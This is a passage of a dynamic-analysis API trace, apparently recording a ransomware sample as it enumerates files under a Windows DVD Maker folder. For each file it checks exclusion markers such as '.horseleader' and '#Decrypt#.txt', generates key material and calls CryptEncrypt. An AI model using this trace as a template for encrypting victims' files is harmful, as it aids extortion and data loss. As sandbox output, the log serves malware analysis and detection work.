pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png") returned 77 [0251.449] StrStrIW (lpFirst="button-highlight.png", lpSrch=".horseleader") returned 0x0 [0251.449] lstrcmpW (lpString1="button-highlight.png", lpString2="#Decrypt#.txt") returned 1 [0251.449] lstrcmpW (lpString1="button-highlight.png", lpString2="_uninstalling_.png") returned 1 [0251.449] lstrlenW (lpString=".testttjffg") returned 11 [0251.449] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png", lpSrch=".testttjffg") returned 0x0 [0251.449] CryptGenRandom (in: 
hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.449] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.449] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\button-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.450] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729d59b7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729d59b7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a39de7d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x55f, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="chapters-static.png", cAlternateFileName="")) returned 1 [0251.450] lstrcmpiW (lpString1="chapters-static.png", lpString2="Windows") returned -1 [0251.450] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png") returned 76 [0251.450] StrStrIW (lpFirst="chapters-static.png", lpSrch=".horseleader") returned 0x0 [0251.450] lstrcmpW (lpString1="chapters-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.450] lstrcmpW (lpString1="chapters-static.png", lpString2="_uninstalling_.png") returned 1 [0251.450] lstrlenW (lpString=".testttjffg") returned 11 [0251.450] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png", lpSrch=".testttjffg") returned 0x0 [0251.450] CryptGenRandom 
(in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.450] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.450] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\chapters-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.451] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729fbb14, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729fbb14, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4aba6851, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8df12, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="content-background.png", cAlternateFileName="")) returned 1 [0251.451] lstrcmpiW (lpString1="content-background.png", lpString2="Windows") returned -1 [0251.451] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png") returned 79 [0251.452] StrStrIW (lpFirst="content-background.png", lpSrch=".horseleader") returned 0x0 [0251.452] lstrcmpW (lpString1="content-background.png", lpString2="#Decrypt#.txt") returned 1 [0251.452] lstrcmpW (lpString1="content-background.png", lpString2="_uninstalling_.png") returned 1 [0251.452] lstrlenW (lpString=".testttjffg") returned 11 [0251.452] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png", lpSrch=".testttjffg") returned 0x0 
[0251.452] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.452] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.452] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.452] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72a47dce, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72a47dce, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b362f69, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2f0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="content-foreground.png", cAlternateFileName="")) returned 1 [0251.452] lstrcmpiW (lpString1="content-foreground.png", lpString2="Windows") returned -1 [0251.452] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png") returned 79 [0251.453] StrStrIW (lpFirst="content-foreground.png", lpSrch=".horseleader") returned 0x0 [0251.453] lstrcmpW (lpString1="content-foreground.png", lpString2="#Decrypt#.txt") returned 1 [0251.453] lstrcmpW (lpString1="content-foreground.png", lpString2="_uninstalling_.png") returned 1 [0251.453] lstrlenW (lpString=".testttjffg") returned 11 [0251.453] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png", 
lpSrch=".testttjffg") returned 0x0 [0251.453] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.453] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.453] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-foreground.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.453] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72a6df2b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72a6df2b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b362f69, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb8c4, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="curtains.png", cAlternateFileName="")) returned 1 [0251.453] lstrcmpiW (lpString1="curtains.png", lpString2="Windows") returned -1 [0251.453] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png") returned 69 [0251.453] StrStrIW (lpFirst="curtains.png", lpSrch=".horseleader") returned 0x0 [0251.454] lstrcmpW (lpString1="curtains.png", lpString2="#Decrypt#.txt") returned 1 [0251.454] lstrcmpW (lpString1="curtains.png", lpString2="_uninstalling_.png") returned 1 [0251.454] lstrlenW (lpString=".testttjffg") returned 11 [0251.454] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png", lpSrch=".testttjffg") returned 0x0 
[0251.454] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.454] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.454] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\curtains.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.454] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b52759, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72b52759, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b3fb4e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12d98, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="flower_precomp_matte.wmv", cAlternateFileName="")) returned 1 [0251.454] lstrcmpiW (lpString1="flower_precomp_matte.wmv", lpString2="Windows") returned -1 [0251.454] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv") returned 81 [0251.455] StrStrIW (lpFirst="flower_precomp_matte.wmv", lpSrch=".horseleader") returned 0x0 [0251.455] lstrcmpW (lpString1="flower_precomp_matte.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.455] lstrcmpW (lpString1="flower_precomp_matte.wmv", lpString2="_uninstalling_.png") returned 1 [0251.455] lstrlenW (lpString=".testttjffg") returned 11 [0251.455] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv", 
lpSrch=".testttjffg") returned 0x0 [0251.455] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.455] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.455] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_precomp_matte.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.458] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b52759, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72b52759, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b3fb4e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x14cd8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="flower_PreComp_MATTE_PAL.wmv", cAlternateFileName="")) returned 1 [0251.458] lstrcmpiW (lpString1="flower_PreComp_MATTE_PAL.wmv", lpString2="Windows") returned -1 [0251.459] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv") returned 85 [0251.459] StrStrIW (lpFirst="flower_PreComp_MATTE_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.459] lstrcmpW (lpString1="flower_PreComp_MATTE_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.459] lstrcmpW (lpString1="flower_PreComp_MATTE_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.459] lstrlenW (lpString=".testttjffg") returned 11 [0251.459] StrStrW (lpFirst="\\\\?\\C:\\Program 
Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.459] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.459] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.459] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_precomp_matte_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.459] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b788b6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72b788b6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b42163f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x26618, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="flower_trans_matte.wmv", cAlternateFileName="")) returned 1 [0251.460] lstrcmpiW (lpString1="flower_trans_matte.wmv", lpString2="Windows") returned -1 [0251.460] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv") returned 79 [0251.460] StrStrIW (lpFirst="flower_trans_matte.wmv", lpSrch=".horseleader") returned 0x0 [0251.460] lstrcmpW (lpString1="flower_trans_matte.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.460] lstrcmpW (lpString1="flower_trans_matte.wmv", lpString2="_uninstalling_.png") returned 1 [0251.460] lstrlenW (lpString=".testttjffg") returned 
11 [0251.460] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv", lpSrch=".testttjffg") returned 0x0 [0251.460] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.460] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.460] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_matte.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.460] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b9ea13, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72b9ea13, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b42163f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x28558, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="flower_trans_MATTE_PAL.wmv", cAlternateFileName="")) returned 1 [0251.461] lstrcmpiW (lpString1="flower_trans_MATTE_PAL.wmv", lpString2="Windows") returned -1 [0251.461] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv") returned 83 [0251.461] StrStrIW (lpFirst="flower_trans_MATTE_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.461] lstrcmpW (lpString1="flower_trans_MATTE_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.461] lstrcmpW (lpString1="flower_trans_MATTE_PAL.wmv", lpString2="_uninstalling_.png") returned 
1 [0251.461] lstrlenW (lpString=".testttjffg") returned 11 [0251.461] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.461] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.461] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.461] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_matte_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.461] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b0649f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72b0649f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b44779d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2e31e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="flower_trans_rgb.wmv", cAlternateFileName="")) returned 1 [0251.461] lstrcmpiW (lpString1="flower_trans_rgb.wmv", lpString2="Windows") returned -1 [0251.461] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv") returned 77 [0251.461] StrStrIW (lpFirst="flower_trans_rgb.wmv", lpSrch=".horseleader") returned 0x0 [0251.462] lstrcmpW (lpString1="flower_trans_rgb.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.462] lstrcmpW (lpString1="flower_trans_rgb.wmv", 
lpString2="_uninstalling_.png") returned 1 [0251.462] lstrlenW (lpString=".testttjffg") returned 11 [0251.462] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv", lpSrch=".testttjffg") returned 0x0 [0251.462] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.462] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.462] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_rgb.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.463] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b2c5fc, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72b2c5fc, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b5c4549, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x39e98, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="flower_trans_RGB_PAL.wmv", cAlternateFileName="")) returned 1 [0251.463] lstrcmpiW (lpString1="flower_trans_RGB_PAL.wmv", lpString2="Windows") returned -1 [0251.463] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv") returned 81 [0251.463] StrStrIW (lpFirst="flower_trans_RGB_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.463] lstrcmpW (lpString1="flower_trans_RGB_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.463] lstrcmpW 
(lpString1="flower_trans_RGB_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.463] lstrlenW (lpString=".testttjffg") returned 11 [0251.463] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.463] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.464] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.464] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_rgb_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.464] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72a94088, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72a94088, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b5c4549, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x609, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="highlight.png", cAlternateFileName="")) returned 1 [0251.464] lstrcmpiW (lpString1="highlight.png", lpString2="Windows") returned -1 [0251.464] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png") returned 70 [0251.464] StrStrIW (lpFirst="highlight.png", lpSrch=".horseleader") returned 0x0 [0251.464] lstrcmpW (lpString1="highlight.png", lpString2="#Decrypt#.txt") returned 1 [0251.464] lstrcmpW 
(lpString1="highlight.png", lpString2="_uninstalling_.png") returned 1 [0251.464] lstrlenW (lpString=".testttjffg") returned 11 [0251.464] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png", lpSrch=".testttjffg") returned 0x0 [0251.464] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.464] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.464] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.465] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72aba1e5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72aba1e5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b5ea6a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x239b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="mainimage-mask.png", cAlternateFileName="")) returned 1 [0251.465] lstrcmpiW (lpString1="mainimage-mask.png", lpString2="Windows") returned -1 [0251.465] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png") returned 75 [0251.465] StrStrIW (lpFirst="mainimage-mask.png", lpSrch=".horseleader") returned 0x0 [0251.465] lstrcmpW (lpString1="mainimage-mask.png", lpString2="#Decrypt#.txt") returned 1 [0251.465] lstrcmpW 
